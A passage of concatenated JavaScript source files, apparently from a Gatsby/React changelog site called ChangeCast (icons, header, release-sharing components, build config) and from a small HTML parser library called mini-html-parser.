<g fillRule="nonzero">
<path
d="M23.723 18.901a.287.287 0 0 0-.26-.166h-3.398l3.355-5.295a.287.287 0 0 0-.243-.44h-4.589a.287.287 0 0 0-.256.159l-4.302 8.603a.286.286 0 0 0 .257.414h2.949l-3.214 7.632a.287.287 0 0 0 .484.296l9.177-10.897a.287.287 0 0 0 .04-.306z"
fill="#4D61FC"
/>
<path
d="M26.973 18.901a.287.287 0 0 0-.26-.166h-3.398l3.355-5.295a.287.287 0 0 0-.242-.44h-4.59a.287.287 0 0 0-.256.159l-4.302 8.603a.286.286 0 0 0 .257.414h2.949l-3.214 7.632a.287.287 0 0 0 .484.296l9.177-10.897a.287.287 0 0 0 .04-.306z"
stroke="#E9F1FF"
fill="#00396B"
/>
</g>
</g>
</svg>
)
<|start_filename|>icons/Cast.js<|end_filename|>
import React from 'react'
export const Cast = props => (
<svg width={24} height={24} viewBox="0 0 24 24" {...props}>
<g fill="currentColor" fillRule="nonzero">
<path d="M16.031 23.237a1.001 1.001 0 0 1-.367-1.931A9.942 9.942 0 0 0 22 12c0-5.514-4.486-10-10-10S2 6.486 2 12c0 4.13 2.48 7.781 6.319 9.302a1 1 0 1 1-.736 1.86A11.945 11.945 0 0 1 0 12C0 5.383 5.383 0 12 0s12 5.383 12 12c0 4.965-2.984 9.349-7.603 11.168-.12.047-.244.069-.366.069z" />
<path d="M9.07 19.359a.987.987 0 0 1-.418-.092A8.026 8.026 0 0 1 4 12c0-4.411 3.589-8 8-8s8 3.589 8 8a7.958 7.958 0 0 1-4.459 7.176 1 1 0 0 1-.887-1.793A5.968 5.968 0 0 0 18 12c0-3.309-2.691-6-6-6s-6 2.691-6 6a6.02 6.02 0 0 0 3.489 5.451 1 1 0 0 1-.419 1.908z" />
<path d="M15 12c0-1.654-1.346-3-3-3s-3 1.346-3 3c0 1.302.838 2.401 2 2.815V23a1 1 0 1 0 2 0v-8.185A2.995 2.995 0 0 0 15 12zm-3 1c-.551 0-1-.449-1-1 0-.551.449-1 1-1 .551 0 1 .449 1 1 0 .551-.449 1-1 1z" />
</g>
</svg>
)
<|start_filename|>site/src/utils/copyToClipboard.js<|end_filename|>
export const copyToClipboard = str => {
const el = document.createElement('textarea') // Create a <textarea> element
el.value = str // Set its value to the string that you want copied
el.setAttribute('readonly', '') // Make it readonly to be tamper-proof
el.style.position = 'absolute'
el.style.left = '-9999px' // Move outside the screen to make it invisible
document.body.appendChild(el) // Append the <textarea> element to the HTML document
const selectedContent = document.getSelection()
const selected =
selectedContent && selectedContent.rangeCount > 0
? selectedContent.getRangeAt(0)
: false
el.select() // Select the <textarea> content
document.execCommand('copy')
document.body.removeChild(el) // Remove the <textarea> element
if (selected && selectedContent) {
// If a selection existed before copying
selectedContent.removeAllRanges() // Unselect everything on the HTML document
selectedContent.addRange(selected) // Restore the original selection
}
}
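// Usage sketch (matches the call in Release/Release.js):
//
//   copyToClipboard(`${url}/${tagName}`) // copy the shareable release link
//
// Note: document.execCommand('copy') generally only succeeds inside a user
// gesture, which is why Release.js invokes this from a button's onClick.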
<|start_filename|>docs/src/components/Header.js<|end_filename|>
import { graphql, useStaticQuery } from 'gatsby'
import Img from 'gatsby-image'
import { Radio } from 'icons/Radio'
import React from 'react'
import { AnchorButton } from './Button/AnchorButton'
import { Button } from './Button/Button'
import { LinkButton } from './Button/LinkButton'
export const Header = () => {
const {
file: {
childImageSharp: { fluid },
},
} = useStaticQuery(graphql`
query {
file(relativePath: { eq: "oleg-laptev-546607-unsplash.png" }) {
childImageSharp {
fluid(maxWidth: 600) {
...GatsbyImageSharpFluid_tracedSVG
}
}
}
}
`)
return (
<>
<header
css={{
position: 'relative',
background: '#f0f0f0',
}}
>
<nav
css={{
padding: '20px 0',
'@media (max-width: 600px)': {
padding: '10px 0',
},
}}
>
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
'@media (max-width: 600px)': {
padding: 0,
},
maxWidth: 1080,
}}
>
<div
css={{
display: 'flex',
flexWrap: 'wrap',
justifyContent: 'space-between',
alignItems: 'center',
}}
>
<LinkButton
to="/"
css={{
display: 'flex',
alignItems: 'center',
}}
>
<Radio css={{ color: 'black' }} />
<span
css={{
fontWeight: 'bold',
color: 'black',
marginLeft: '1rem',
}}
>
ChangeCast
</span>
</LinkButton>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
display: 'flex',
alignItems: 'center',
'@media (max-width: 600px)': {
display: 'none',
},
}}
>
<li
css={{
marginRight: 15,
marginBottom: 0,
display: 'flex',
alignItems: 'center',
}}
>
<Button
css={{ color: 'black' }}
data-changecast-changecast={true}
>
What's New?
</Button>
</li>
<li
css={{
marginBottom: 0,
display: 'flex',
alignItems: 'center',
}}
>
<AnchorButton
href="https://github.com/palmerhq/changecast"
css={{ color: 'black' }}
>
Github
</AnchorButton>
</li>
</ul>
</div>
</div>
</nav>
<div
css={{
marginLeft: 'auto',
marginRight: 'auto',
width: '100%',
height: '80vh',
'@media (max-width: 600px)': {
height: 0,
flexDirection: 'column-reverse',
},
minHeight: 530,
maxWidth: 1080,
display: 'flex',
alignItems: 'center',
justifyContent: 'center',
}}
>
<div
css={{
maxWidth: '500px',
padding: '0 20px',
width: '50%',
'@media (max-width: 600px)': {
width: '100%',
},
}}
>
<h2
css={{
color: 'black',
fontSize: '3em',
'@media (max-width: 600px)': {
fontSize: '2em',
},
}}
>
Keep users informed.
</h2>
<p css={{ color: 'black' }}>
Create{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
beautiful
</span>
,{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
performant
</span>
,{' '}
<span css={{ color: 'royalblue', fontWeight: 'bold' }}>
accessible
</span>{' '}
changelogs from your Github releases.
</p>
</div>
<div
css={{
display: 'flex',
justifyContent: 'center',
width: '50%',
padding: '0 50px',
'@media (max-width: 600px)': {
width: '100%',
maxWidth: 400,
padding: '0 75px',
},
}}
>
<Img
fluid={fluid}
style={{
width: '100%',
}}
imgStyle={{
width: '100%',
}}
/>
</div>
</div>
</header>
</>
)
}
<|start_filename|>icons/Close.js<|end_filename|>
import React from 'react'
export const Close = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Close_svg__feather Close_svg__feather-x"
{...props}
>
<path d="M18 6L6 18M6 6l12 12" />
</svg>
)
<|start_filename|>widget/webpack.config.js<|end_filename|>
const path = require('path')
const crypto = require('crypto')
const webpack = require('webpack')
const copyWebpackPlugin = require('copy-webpack-plugin')
const { config } = require('dotenv')
config({ path: path.resolve('..', '.env') })
const bundleOutputDir = '../site/static'
const repoHash = crypto
.createHash(`md5`)
.update(process.env.REPO_URL)
.digest(`hex`)
const shortRepoHash = repoHash.substr(repoHash.length - 5)
module.exports = (env, { mode }) => {
return [
{
entry: './src/widget.js',
output: {
filename: 'widget.js',
path: path.resolve(bundleOutputDir),
},
devServer: {
contentBase: bundleOutputDir,
},
optimization: {
minimize: mode === 'production',
},
plugins: [
new webpack.EnvironmentPlugin({
URL: process.env.DEPLOY_URL || process.env.URL || '',
REPO_HASH: shortRepoHash,
}),
...(mode === 'development'
? [
new webpack.SourceMapDevToolPlugin(),
new copyWebpackPlugin([{ from: './' }]),
]
: []),
],
module: {
rules: [
{
test: /\.css$/,
use: [
'style-loader',
{
loader: 'css-loader',
options: {
modules: true,
hashPrefix: shortRepoHash,
},
},
],
},
{
test: /\.js$/,
exclude: /node_modules/,
use: {
loader: 'babel-loader',
options: {
presets: [
[
'@babel/env',
{
targets: {
browsers: ['ie 6', 'safari 7'],
},
},
],
],
},
},
},
],
},
},
]
}
<|start_filename|>icons/AbstractIcon9.js<|end_filename|>
import React from 'react'
export const AbstractIcon9 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M16.943 13.96l5.94 5.939-5.94 5.94-5.94-5.94z" />
<path fill="#00396B" d="M22.855 13.96l5.94 5.939-5.94 5.94-5.94-5.94z" />
<path fill="#EAF0FF" d="M19.857 16.957l2.97 2.97-2.97 2.97-2.97-2.97z" />
</g>
</svg>
)
<|start_filename|>icons/AbstractIcon12.js<|end_filename|>
import React from 'react'
export const AbstractIcon12 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<defs>
<path id="AbstractIcon12_svg__a" d="M3 0h10v12l-5 3-5-3z" />
</defs>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<g transform="matrix(1 0 0 -1 12 27)">
<path fill="#00396B" d="M0 1h16v7.67H0z" />
<use fill="#4D61FC" xlinkHref="#AbstractIcon12_svg__a" />
<path stroke="#EAF0FF" d="M3.5.5v11.217l4.5 2.7 4.5-2.7V.5h-9z" />
</g>
</g>
</svg>
)
<|start_filename|>docs/gatsby-node.js<|end_filename|>
const path = require('path')
exports.createPages = async ({ graphql, actions: { createPage } }) => {
const indexTemplate = path.resolve('./src/templates/IndexTemplate.js')
const ogText = 'ChangeCast'
createPage({
path: `/`,
component: indexTemplate,
context: {
ogText,
},
})
}
<|start_filename|>icons/Search.js<|end_filename|>
import React from 'react'
export const Search = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Search_svg__feather Search_svg__feather-search"
{...props}
>
<circle cx={11} cy={11} r={8} />
<path d="M21 21l-4.35-4.35" />
</svg>
)
<|start_filename|>icons/AbstractIcon4.js<|end_filename|>
import React from 'react'
export const AbstractIcon4 = props => (
<svg width={40} height={40} viewBox="0 0 40 40" {...props}>
<g fill="none" fillRule="evenodd">
<circle fill="#E9F1FF" cx={20} cy={20} r={20} />
<path fill="#4D61FC" d="M20 13l7 8.235H13z" />
<path stroke="#E9F1FF" fill="#00396B" d="M20 17.588L28 27H12z" />
</g>
</svg>
)
<|start_filename|>site/src/components/Release/Release.js<|end_filename|>
import { Clipboard } from 'icons/Clipboard'
import { Facebook } from 'icons/Facebook'
import { Linkedin } from 'icons/Linkedin'
import { Twitter } from 'icons/Twitter'
import React from 'react'
import { markdownStyles } from '../../styles/markdown'
import { theme } from '../../styles/theme'
import { copyToClipboard } from '../../utils/copyToClipboard'
import { windowPopup } from '../../utils/windowPopup'
import { ReleaseHeader } from './ReleaseHeader'
import { SocialButton } from './SocialButton'
export const Release = React.memo(
({
releaseName,
tagName,
publishedAt,
plainText,
html,
isWidget,
primaryColor,
url,
}) => {
const [red, green, blue] = primaryColor
const shareableUrl = `${url}/${tagName}`
const title = releaseName || tagName
return (
<div
css={{
position: 'relative',
width: '100%',
marginBottom: '0.5rem',
background: 'white',
borderRadius: 0,
borderTop: '1px solid lightgray',
borderBottom: '1px solid lightgray',
[theme.media.small]: {
borderRadius: 3,
border: '1px solid lightgray',
},
}}
>
<ReleaseHeader
title={title}
tagName={tagName}
publishedAt={publishedAt}
isWidget={isWidget}
primaryColor={primaryColor}
url={url}
/>
<div css={{ padding: '0 1rem', margin: '1rem 0' }}>
{plainText ? (
<div
className="release"
css={[
markdownStyles,
{
a: {
color: `rgb(${red}, ${green}, ${blue})`,
},
[`*:not(pre) > code[class*='language-'], pre[class*='language-']`]: {
background: `rgb(${red}, ${green}, ${blue}, 0.1)`,
},
},
]}
dangerouslySetInnerHTML={{ __html: html }}
/>
) : (
<em>No release notes.</em>
)}
</div>
<div
css={{
display: 'flex',
justifyContent: 'flex-end',
borderTop: '1px solid lightgray',
padding: '0.5rem',
}}
>
<SocialButton
label="Share on Facebook"
icon={Facebook}
onClick={() =>
windowPopup(
`https://www.facebook.com/sharer/sharer.php?u=${encodeURIComponent(
shareableUrl
)}`,
500,
300
)
}
/>
<SocialButton
label="Share on Twitter"
icon={Twitter}
onClick={() =>
windowPopup(
`https://twitter.com/intent/tweet?url=${encodeURIComponent(
shareableUrl
)}`,
500,
300
)
}
/>
<SocialButton
label="Share on Linkedin"
icon={Linkedin}
onClick={() =>
windowPopup(
`https://www.linkedin.com/shareArticle?url=${encodeURIComponent(
shareableUrl
)}&mini=true`,
500,
300
)
}
/>
<SocialButton
label="Copy link"
icon={Clipboard}
onClick={() => copyToClipboard(shareableUrl)}
/>
</div>
</div>
)
}
)
<|start_filename|>site/src/components/Release/ReleaseHeader.js<|end_filename|>
import {
differenceInDays,
distanceInWordsToNow,
format,
isThisYear,
} from 'date-fns'
import { Link } from 'gatsby'
import React from 'react'
import { theme } from '../../styles/theme'
import { CHANGECAST_LOCALSTORAGE_KEY } from '../../utils/constants'
import { Tag } from '../Tag'
export const ReleaseHeader = ({
title,
tagName,
publishedAt,
isWidget,
primaryColor: [red, green, blue],
url,
...rest
}) => {
const lastViewed =
typeof window !== 'undefined' &&
window.localStorage.getItem(CHANGECAST_LOCALSTORAGE_KEY)
const isNew = lastViewed && new Date(lastViewed) < new Date(publishedAt)
return (
<div
css={{
padding: '1rem',
display: 'flex',
alignItems: 'center',
justifyContent: 'space-between',
borderBottom: '1px solid lightgray',
background: 'white',
}}
{...rest}
>
<div css={{ display: 'flex', alignItems: 'center' }}>
<h2
css={{
margin: '0',
}}
>
{isWidget ? (
<a
href={`/${tagName}`}
target="_blank"
rel="noopener noreferrer"
css={{ color: `rgb(${red}, ${green}, ${blue})` }}
>
{title}
</a>
) : (
<Link
to={`/${tagName}`}
css={{ color: `rgb(${red}, ${green}, ${blue})` }}
>
{title}
</Link>
)}
</h2>
{isNew && (
<Tag
css={{
margin: '0 1rem',
backgroundColor: `rgb(${red}, ${green}, ${blue})`,
}}
>
New
</Tag>
)}
</div>
{typeof window !== 'undefined' && (
<p
css={{
color: theme.color.accent,
margin: 0,
flexShrink: 0,
}}
>
{differenceInDays(Date.now(), publishedAt) < 30
? distanceInWordsToNow(publishedAt, {
addSuffix: true,
})
: isThisYear(publishedAt)
? format(publishedAt, 'MMM D')
: format(publishedAt, 'MMMM Do, YYYY')}
</p>
)}
</div>
)
}
<|start_filename|>docs/src/components/Features.js<|end_filename|>
import React from 'react'
export const Features = ({ children }) => (
<div
css={{
marginRight: 'auto',
marginLeft: 'auto',
padding: '0 15px',
maxWidth: '1080px',
}}
>
<ul
css={{
padding: '0',
margin: '0',
listStyle: 'none',
display: 'flex',
justifyContent: 'space-between',
alignItems: 'flex-start',
flexWrap: 'wrap',
marginTop: '60px',
['@media (max-width: 990px)']: {
justifyContent: 'center',
},
}}
>
{children}
</ul>
</div>
)
<|start_filename|>icons/Linkedin.js<|end_filename|>
import React from 'react'
export const Linkedin = props => (
<svg
width={24}
height={24}
viewBox="0 0 24 24"
fill="none"
stroke="currentColor"
strokeWidth={2}
strokeLinecap="round"
strokeLinejoin="round"
className="Linkedin_svg__feather Linkedin_svg__feather-linkedin"
{...props}
>
<path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6zM2 9h4v12H2z" />
<circle cx={4} cy={4} r={2} />
</svg>
)
<|start_filename|>plugins/gatsby-transformer-color-thief/gatsby-node.js<|end_filename|>
const { getColorFromURL, getPaletteFromURL } = require('color-thief-node')
const luminance = require('relative-luminance')
exports.onCreateNode = async ({
node,
actions: { createNode, createNodeField },
loadNodeContent,
createNodeId,
createContentDigest,
}) => {
if (
node.internal.mediaType !== 'image/png' &&
node.internal.mediaType !== 'image/jpeg'
) {
return
}
const dominantColor = await getColorFromURL(node.relativePath)
const colorPalette = await getPaletteFromURL(node.relativePath)
const sortedColorPalette = colorPalette.sort(
(colorA, colorB) => luminance(colorA) - luminance(colorB)
)
createNodeField({ node, name: 'dominantColor', value: dominantColor })
createNodeField({ node, name: 'colorPalette', value: sortedColorPalette })
}
<|start_filename|>dist/mini-html-parser.js<|end_filename|>
;(function(){
/**
* Require the given path.
*
* @param {String} path
* @return {Object} exports
* @api public
*/
function require(path, parent, orig) {
var resolved = require.resolve(path);
// lookup failed
if (null == resolved) {
orig = orig || path;
parent = parent || 'root';
var err = new Error('Failed to require "' + orig + '" from "' + parent + '"');
err.path = orig;
err.parent = parent;
err.require = true;
throw err;
}
var module = require.modules[resolved];
// perform real require()
// by invoking the module's
// registered function
if (!module._resolving && !module.exports) {
var mod = {};
mod.exports = {};
mod.client = mod.component = true;
module._resolving = true;
module.call(this, mod.exports, require.relative(resolved), mod);
delete module._resolving;
module.exports = mod.exports;
}
return module.exports;
}
/**
* Registered modules.
*/
require.modules = {};
/**
* Registered aliases.
*/
require.aliases = {};
/**
* Resolve `path`.
*
* Lookup:
*
* - PATH/index.js
* - PATH.js
* - PATH
*
* @param {String} path
* @return {String} path or null
* @api private
*/
require.resolve = function(path) {
if (path.charAt(0) === '/') path = path.slice(1);
var paths = [
path,
path + '.js',
path + '.json',
path + '/index.js',
path + '/index.json'
];
for (var i = 0; i < paths.length; i++) {
var path = paths[i];
if (require.modules.hasOwnProperty(path)) return path;
if (require.aliases.hasOwnProperty(path)) return require.aliases[path];
}
};
/**
* Normalize `path` relative to the current path.
*
* @param {String} curr
* @param {String} path
* @return {String}
* @api private
*/
require.normalize = function(curr, path) {
var segs = [];
if ('.' != path.charAt(0)) return path;
curr = curr.split('/');
path = path.split('/');
for (var i = 0; i < path.length; ++i) {
if ('..' == path[i]) {
curr.pop();
} else if ('.' != path[i] && '' != path[i]) {
segs.push(path[i]);
}
}
return curr.concat(segs).join('/');
};
/**
* Register module at `path` with callback `definition`.
*
* @param {String} path
* @param {Function} definition
* @api private
*/
require.register = function(path, definition) {
require.modules[path] = definition;
};
/**
* Alias a module definition.
*
* @param {String} from
* @param {String} to
* @api private
*/
require.alias = function(from, to) {
if (!require.modules.hasOwnProperty(from)) {
throw new Error('Failed to alias "' + from + '", it does not exist');
}
require.aliases[to] = from;
};
/**
* Return a require function relative to the `parent` path.
*
* @param {String} parent
* @return {Function}
* @api private
*/
require.relative = function(parent) {
var p = require.normalize(parent, '..');
/**
* lastIndexOf helper.
*/
function lastIndexOf(arr, obj) {
var i = arr.length;
while (i--) {
if (arr[i] === obj) return i;
}
return -1;
}
/**
* The relative require() itself.
*/
function localRequire(path) {
var resolved = localRequire.resolve(path);
return require(resolved, parent, path);
}
/**
* Resolve relative to the parent.
*/
localRequire.resolve = function(path) {
var c = path.charAt(0);
if ('/' == c) return path.slice(1);
if ('.' == c) return require.normalize(p, path);
// resolve deps by returning
// the dep in the nearest "deps"
// directory
var segs = parent.split('/');
var i = lastIndexOf(segs, 'deps') + 1;
if (!i) i = 0;
path = segs.slice(0, i + 1).join('/') + '/deps/' + path;
return path;
};
/**
* Check if module is defined at `path`.
*/
localRequire.exists = function(path) {
return require.modules.hasOwnProperty(localRequire.resolve(path));
};
return localRequire;
};
require.register("visionmedia-debug/index.js", function(exports, require, module){
if ('undefined' == typeof window) {
module.exports = require('./lib/debug');
} else {
module.exports = require('./debug');
}
});
require.register("visionmedia-debug/debug.js", function(exports, require, module){
/**
* Expose `debug()` as the module.
*/
module.exports = debug;
/**
* Create a debugger with the given `name`.
*
* @param {String} name
* @return {Type}
* @api public
*/
function debug(name) {
if (!debug.enabled(name)) return function(){};
return function(fmt){
fmt = coerce(fmt);
var curr = new Date;
var ms = curr - (debug[name] || curr);
debug[name] = curr;
fmt = name
+ ' '
+ fmt
+ ' +' + debug.humanize(ms);
// This hackery is required for IE8
// where `console.log` doesn't have 'apply'
window.console
&& console.log
&& Function.prototype.apply.call(console.log, console, arguments);
}
}
/**
* The currently active debug mode names.
*/
debug.names = [];
debug.skips = [];
/**
* Enables a debug mode by name. This can include modes
* separated by a colon and wildcards.
*
* @param {String} name
* @api public
*/
debug.enable = function(name) {
try {
localStorage.debug = name;
} catch(e){}
var split = (name || '').split(/[\s,]+/)
, len = split.length;
for (var i = 0; i < len; i++) {
name = split[i].replace('*', '.*?');
if (name[0] === '-') {
debug.skips.push(new RegExp('^' + name.substr(1) + '$'));
}
else {
debug.names.push(new RegExp('^' + name + '$'));
}
}
};
/**
* Disable debug output.
*
* @api public
*/
debug.disable = function(){
debug.enable('');
};
/**
* Humanize the given `ms`.
*
 * @param {Number} ms
* @return {String}
* @api private
*/
debug.humanize = function(ms) {
var sec = 1000
, min = 60 * 1000
, hour = 60 * min;
if (ms >= hour) return (ms / hour).toFixed(1) + 'h';
if (ms >= min) return (ms / min).toFixed(1) + 'm';
if (ms >= sec) return (ms / sec | 0) + 's';
return ms + 'ms';
};
/**
* Returns true if the given mode name is enabled, false otherwise.
*
* @param {String} name
* @return {Boolean}
* @api public
*/
debug.enabled = function(name) {
for (var i = 0, len = debug.skips.length; i < len; i++) {
if (debug.skips[i].test(name)) {
return false;
}
}
for (var i = 0, len = debug.names.length; i < len; i++) {
if (debug.names[i].test(name)) {
return true;
}
}
return false;
};
/**
* Coerce `val`.
*/
function coerce(val) {
if (val instanceof Error) return val.stack || val.message;
return val;
}
// persist
try {
if (window.localStorage) debug.enable(localStorage.debug);
} catch(e){}
});
require.register("mini-html-parser/index.js", function(exports, require, module){
/**
* Module exports
*/
var debug = require('debug')('html-parser');
/**
* Expose `Parser`
*/
exports = module.exports = Parser;
/**
* Simplified DOM nodes
*/
var nodes = exports.nodes = {
comment : require('./nodes/comment'),
element : require('./nodes/element'),
text : require('./nodes/text')
};
/**
* HTML5 Empty Elements
*/
var empty = { area: true, base: true, basefont: true, br: true, col: true, command: true, embed: true, frame: true, hr: true, img: true, input: true, isindex: true, keygen: true, link: true, meta: true, param: true, source: true, track: true, wbr: true };
/**
* Special tags that can contain anything
*/
var special = { script: true, style: true };
/**
* Attributes that autofill
*/
var autofill = { autofocus: true, autoplay: true, async: true, checked: true, controls: true, defer: true, disabled: true, hidden: true, loop: true, multiple: true, open: true, readonly: true, required: true, scoped: true, selected: true }
/**
* Regexs
*/
var rcomment = /^<!--([\s\S]*)-->/;
var rstarttag = /^<([-A-Za-z0-9_]+)((?:\s+\w+(?:\s*=\s*(?:(?:"[^"]*")|(?:'[^']*')|[^>\s]+))?)*)\s*(\/?)>/;
var rattr = /([-A-Za-z0-9_]+)(?:\s*=\s*(?:(?:"((?:\\.|[^"])*)")|(?:'((?:\\.|[^'])*)')|([^>\s]+)))?/g;
var rendtag = /^<\/([-A-Za-z0-9_]+)[^>]*>/;
var rtext = /^[^<]+/;
/**
* Create regex for special tags
*/
var rspecial = {};
for (var tag in special) rspecial[tag] = new RegExp('<\/' + tag + '[^>]*>', 'i');
/**
* Create a new `Parser`
*
* @param {String} html
* @return {Parser}
* @api public
*/
function Parser(html) {
if (!(this instanceof Parser)) return new Parser(html);
this.html = this.original = html;
this.tokens = [];
this.root = this.tree = [];
this.err = null;
this.parent = null;
}
/**
* Parse all the nodes
*
* @return {Object|Error} dom
* @api public
*/
Parser.prototype.parse = function() {
while (!this.err && this.advance() != 'eos');
return this.err ? this.err : this.root;
}
/**
* Advance to the next token
*
* @return {String} token
* @api public
*/
Parser.prototype.advance = function() {
var tok = this.eos()
|| this.comment()
|| this.endtag()
|| this.starttag()
|| this.text()
|| this.error()
this.tokens.push(tok);
return tok;
}
/**
* Consume the given `len`.
*
* @param {Number|Array} len
* @api private
*/
Parser.prototype.skip = function(len){
this.html = this.html.substr(Array.isArray(len)
? len[0].length
: len);
};
/**
* End of string
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.eos = function() {
if (!this.html.length) return 'eos';
};
/**
* Comment
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.comment = function() {
var captures;
if (captures = rcomment.exec(this.html)) {
this.skip(captures);
    var node = nodes.comment(captures[1], this.parent);
debug('<!-- %s -->', captures[1]);
// connect it to the DOM
this.connect(node);
return 'comment';
}
};
/**
* Start Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.starttag = function() {
var captures;
if (captures = rstarttag.exec(this.html)) {
this.skip(captures);
var name = captures[1].toLowerCase();
var attrs = (captures[2]) ? attributes(captures[2]) : {};
var node = nodes.element(name, attrs, this.parent);
debug('<%s>', name)
// connect it to the DOM
this.connect(node);
// handle self-closing tags
// and special tags that can
// contain any content
if (special[name]) {
node = this.special(node);
} else if(!empty[name]) {
this.tree = node.childNodes;
this.parent = node;
}
return 'start-tag';
}
};
/**
* End Tag
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.endtag = function() {
var captures;
if (captures = rendtag.exec(this.html)) {
this.skip(captures);
debug('</%s>', captures[1]);
// move up a level
if (!this.parent) return this.error('No end tag for <' + captures[1] + '>.');
this.parent = this.parent.parentNode;
this.tree = (this.parent) ? this.parent.childNodes : this.root;
return 'end-tag';
}
};
/**
* Text Nodes
*
* @return {String|undefined} token
* @api private
*/
Parser.prototype.text = function() {
var captures;
if (captures = rtext.exec(this.html)) {
this.skip(captures);
var node = nodes.text(captures[0], this.parent);
debug(node.nodeValue);
// connect it to the DOM
this.connect(node);
return 'text';
}
};
/**
* Handle special tags (ex. script, style)
* that can contain any content including "<".
*
* @param {Object} node
* @return {Object} node
*/
Parser.prototype.special = function(node) {
var name = node.nodeName.toLowerCase();
var captures = rspecial[name].exec(this.html);
if (!captures) return this.error('No ending ' + name + ' tag.');
// extract the contents of the tag
var text = this.html.slice(0, captures.index);
// connect DOM
var textnode = nodes.text(text, node);
node.childNodes.push(textnode);
// skip text + length of match
this.skip(text.length + captures[0].length);
return node;
};
/**
* Connect the DOM tree
*
* @param {Object} node
* @return {Parser}
* @api private
*/
Parser.prototype.connect = function(node) {
  // capture the current last node *before* pushing, so siblings link correctly
  var prev = this.tree[this.tree.length - 1];
  this.tree.push(node);
  if (prev) {
    prev.nextSibling = node;
    node.previousSibling = prev;
  }
  return this;
}
/**
* Handle errors
*
* @param {String} err (optional)
* @return {String}
* @api private
*/
Parser.prototype.error = function(err) {
var original = this.original;
var ellipsis = '\u2026';
var caret = '\u2038';
var i = original.length - this.html.length;
// provide a useful error
var at = original.slice(i - 20, i) + caret + original.slice(i, i + 20)
at = original[i - 20] ? ellipsis + at : at
at += original[i + 20] ? ellipsis : '';
// add the message
var msg = err || 'Parsing error.';
msg += ' Near: ' + at;
// set the error
this.err = new Error(msg);
return 'error';
};
/**
* Parse attributes
*
* @param {String} str
* @return {Object}
* @api private
*/
function attributes(str) {
var attrs = {};
str.replace(rattr, function(match, name) {
attrs[name] = arguments[2] || arguments[3] || arguments[4] || autofill[name] || '';
});
return attrs;
}
});
require.register("mini-html-parser/nodes/comment.js", function(exports, require, module){
/**
* Export `comment`
*/
module.exports = comment;
/**
* Create `comment` node
*
 * @param {String} value
 * @param {Object|null} parent
 */
function comment(value, parent) {
return {
nodeType: 8,
nodeValue: value,
nextSibling: null,
nodeName: '#comment',
previousSibling: null,
parentNode: parent || null
};
}
});
require.register("mini-html-parser/nodes/element.js", function(exports, require, module){
/**
* Export `element`
*/
module.exports = element;
/**
* Create `element` node
*
 * @param {String} tag
 * @param {Object|null} attrs
 * @param {Object|null} parent
*/
function element(tag, attrs, parent) {
return {
nodeType: 1,
childNodes: [],
nextSibling: null,
previousSibling: null,
attributes: attrs || {},
parentNode: parent || null,
nodeName: tag.toUpperCase()
};
}
});
require.register("mini-html-parser/nodes/text.js", function(exports, require, module){
/**
* Export `text`
*/
module.exports = text;
/**
* Create `text` node
*
 * @param {String} value
 * @param {Object|null} parent
 */
function text(value, parent) {
return {
nodeType: 3,
nodeValue: value,
nodeName: '#text',
nextSibling: null,
previousSibling: null,
parentNode: parent || null
};
}
});
require.alias("visionmedia-debug/index.js", "mini-html-parser/deps/debug/index.js");
require.alias("visionmedia-debug/debug.js", "mini-html-parser/deps/debug/debug.js");
require.alias("visionmedia-debug/index.js", "debug/index.js");
require.alias("mini-html-parser/index.js", "mini-html-parser/index.js");if (typeof exports == "object") {
module.exports = require("mini-html-parser");
} else if (typeof define == "function" && define.amd) {
define(function(){ return require("mini-html-parser"); });
} else {
this["mini-html-parser"] = require("mini-html-parser");
}})();
<|start_filename|>nodes/text.js<|end_filename|>
/**
* Export `text`
*/
module.exports = text;
/**
* Create `text` node
*
* @param {String} value
* @param {Object|null} parent
*/
function text(value, parent) {
return {
nodeType: 3,
childNodes: [],
nodeValue: value,
nodeName: '#text',
nextSibling: null,
previousSibling: null,
parentNode: parent || null
};
}
<|start_filename|>nodes/element.js<|end_filename|>
/**
* Export `element`
*/
module.exports = element;
/**
* Create `element` node
*
* @param {String} tag
* @param {Object|null} attrs
* @param {Object|null} parent
*/
function element(tag, attrs, parent) {
return {
nodeType: 1,
childNodes: [],
nextSibling: null,
previousSibling: null,
attributes: attrs || {},
parentNode: parent || null,
nodeName: tag.toUpperCase()
};
}
<|start_filename|>nodes/fragment.js<|end_filename|>
/**
* Export `fragment`
*/
module.exports = fragment;
/**
* Create `fragment` node
*
* @return {Object} fragment
*/
function fragment() {
return {
nodeType: 11,
childNodes: [],
parentNode: null,
nextSibling: null,
previousSibling: null,
nodeName: '#fragment'
};
}
<|start_filename|>nodes/comment.js<|end_filename|>
/**
* Export `comment`
*/
module.exports = comment;
/**
* Create `comment` node
*
* @param {String} value
* @param {Object|null} parent
*/
function comment(value, parent) {
return {
nodeType: 8,
nodeValue: value,
nextSibling: null,
nodeName: '#comment',
previousSibling: null,
parentNode: parent || null
};
}
<|start_filename|>index.js<|end_filename|>
/**
* Module exports
*/
var debug = require('debug')('html-parser');
/**
* Expose `Parser`
*/
exports = module.exports = Parser;
/**
* Simplified DOM nodes
*/
var nodes = exports.nodes = {
fragment : require('./nodes/fragment'),
comment : require('./nodes/comment'),
element : require('./nodes/element'),
text : require('./nodes/text')
};
/**
* HTML5 Empty Elements
*/
